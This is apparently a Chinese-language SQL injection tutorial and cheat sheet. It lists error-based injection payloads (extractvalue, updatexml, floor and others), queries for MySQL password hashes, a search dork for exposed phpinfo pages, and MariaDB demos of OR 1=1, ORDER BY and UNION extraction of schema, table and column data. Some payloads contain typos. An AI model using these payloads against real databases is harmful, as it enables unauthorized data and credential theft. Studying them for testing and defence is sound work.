SQL注入

sql注入

sql常用函数

• sql常用函数
  • MID(要截取的字符串,起始位置,结束位置) 截取字符串
  • CHAR(ASCII) 返回ASCII码对应的字符
  • ASCII(字符) 返回字符对应的ASCII码
  • IF(逻辑表达式,返回值1,返回值2) 用于判断
  • SUBSTR(要截取的字符串,起始位置,结束位置) 截取字符串
  • LENGTH(字符串) 返回字符串长度
  • COUT(列名) 返回当前列名下有效记录数
  • SLEEP(s) 静止s秒，数字类型，可自定义
  • # /**/ -- 注释符
  • CONCAT(字符串1,字符串2...) 拼接字符串
  • LOAD_FILE(文件名称) 加载文件
  • INTO OUTFILE '文件名称' 输出

常用十大报错函数

• floor()

  • select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from @R_906_4045@ion_schema.tables group by x) a);

• extractvalue()

  • select * from test where id=1 and (extractvalue(1, conact(0x7e, (select user()),0x7e)));

• updatexml()

  • select * from test where id=1 and (updatexml(1, conact(0x7e, (select user()), 0x7e), 1));

• geometrycollection()

  • select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));

• multipoint()

  • select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));

• polygon()

  • select * from test where id=1 and polyon((select * from (select * from (select user()) a) b));

• multipolygon()

  • select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));

• linestring()

  • select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));

• multilinestring()

  • select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));

• exp()

  • select * from test where id=1 and exp(~(select * from (select user()) a));

MysqL常用函数

• 查询版本

  • select version();

• 查询密码

  • select password from MysqL.user;

• 查询所有数据

  • select * from MysqL.user;

MysqL数据库配置文件

• MysqL用户权限

  • @R_906_4045@ion_schema.USER_PRIVILEGES
  • select * from @R_906_4045@ion_schema.USER_PRIVILEGES;

• MysqL数据库及表的情况

  • @R_906_4045@ion_schema.TABLES
  • select * from @R_906_4045@ion_schema.TABLES;

• MysqL数据库及表的情况(包含字段)

  • @R_906_4045@ion_schema.COLUMNS
  • select * from @R_906_4045@ion_schema.COLUMNS

sql注入测试

• 浏览器中输入

  • inurl:/PHPinfo.PHP

• sql注入是如何产生的

  • 这些攻击发生在当不可信的数据作为命令或者查询语句的一部分,被发送给解释器的时候
  • 攻击者发送的恶意数据可以欺骗解释器
  • 以执行计划外的命令或者在未被恰当授权时访问数据

or语句 sql注入

• 功能
  • 获取整张表额数据

# 正常查询操作
MariaDB [sel]> select * from grades where name='Sunny';
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
+-------+------+---------+------+
# `1 row in set (0.000 sec)`

# sql注入操作
MariaDB [sel]> select * from grades where name='Sunny' or 1=1;
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
| Jerry | boy  |      97 |   91 |
| Marry | girl |      95 |   94 |
| Tommy | boy  |      98 |   94 |
+-------+------+---------+------+
# `4 rows in set (0.001 sec)`

MariaDB [sel]> select * from news where id=0 or 1=1;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript    | 1607050534 |
|  2 | 基本知识  | 第2章 HTML中的Javascript  | 1607050590 |
|  3 | 基本知识  | 第3章 语言基础            | 1607052573 |
|  4 | 基本知识  | 第4章 变量、作用域和内存   | 1607070553 |
+----+----------+--------------------------+------------+
# `4 rows in set (0.001 sec)`

order by语句 sql注入

• 功能
  • 推断表的记录的总量

MariaDB [sel]> select * from news where id=2 order by 5;
# `ERROR 1054 (42S22): UnkNown column '5' in 'order clause'`

MariaDB [sel]> select * from news where id=2 order by 4;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  2 | 基本知识  | 第2章 HTML中的Javascript  | 1607050590 |
+----+----------+--------------------------+------------+
# `1 row in set (0.000 sec)`

union语句 sql注入

• 功能
  • 推断表的字段的总量

# 正常情况
MariaDB [sel]> select * from news where id=1;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
+----+----------+------------------------+------------+
# `1 row in set (0.000 sec)`

MariaDB [sel]> select * from news where id=1 union select 0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`

MariaDB [sel]> select * from news where id=1 union select 0,0,0,0;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
|  0 | 0        | 0                      |          0 |
+----+----------+------------------------+------------+
# `2 rows in set (0.006 sec)`

MariaDB [sel]> select * from news where id=1 union select 0,0,0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`

• 功能
  • 获取MysqL数据

MariaDB [sel]> select * from news where id=1 union select 1,2,host,4 from MysqL.user;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
|  1 | 2        | 127.0.0.1              |          4 |
|  1 | 2        | ::1                    |          4 |
|  1 | 2        | localhost              |          4 |
+----+----------+------------------------+------------+
# `4 rows in set (0.011 sec)`

• 功能
  • 获取数据库中的所有的数据库名

MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_schema from @R_906_4045@ion_schema.TABLES;
+----+-------+---------+--------------------+
| id | title | content | createtime         |
+----+-------+---------+--------------------+
|  1 | 2     | 3       | @R_906_4045@ion_schema |
|  1 | 2     | 3       | MysqL              |
|  1 | 2     | 3       | performance_schema |
|  1 | 2     | 3       | PHPmyadmin         |
|  1 | 2     | 3       | sel                |
|  1 | 2     | 3       | stu                |
+----+-------+---------+--------------------+
# `6 rows in set (0.018 sec)`

• 功能
  • 获取数据库中的所有的表名

MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from @R_906_4045@ion_schema.TABLES;

• 功能
  • 获取某个数据库中的所有的表名

MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from @R_906_4045@ion_schema.TABLES where table_schema='sel';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | bank       |
|  1 | 2     | 3       | best       |
|  1 | 2     | 3       | bestmath   |
|  1 | 2     | 3       | grades     |
|  1 | 2     | 3       | news       |
|  1 | 2     | 3       | resume     |
|  1 | 2     | 3       | stu1       |
|  1 | 2     | 3       | stu2       |
+----+-------+---------+------------+
# `8 rows in set (0.012 sec)`

• 功能
  • 获取某张表中的所有的字段名

MariaDB [sel]> select * from news where id=0 union select 1,2,3,column_name from @R_906_4045@ion_schema.COLUMNS where table_name='news';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | id         |
|  1 | 2     | 3       | title      |
|  1 | 2     | 3       | content    |
|  1 | 2     | 3       | createtime |
+----+-------+---------+------------+
# `4 rows in set (0.016 sec)`

• 功能
  • 获取字段内容

MariaDB [sel]> select * from news where id=1 union select 1,2,3,title from sel.news;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript | 1607050534 |
|  1 | 2        | 3                      | 基本知识   |
+----+----------+------------------------+------------+
# `2 rows in set (0.011 sec)`

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 [email protected] 举报，一经查实，本站将立刻删除。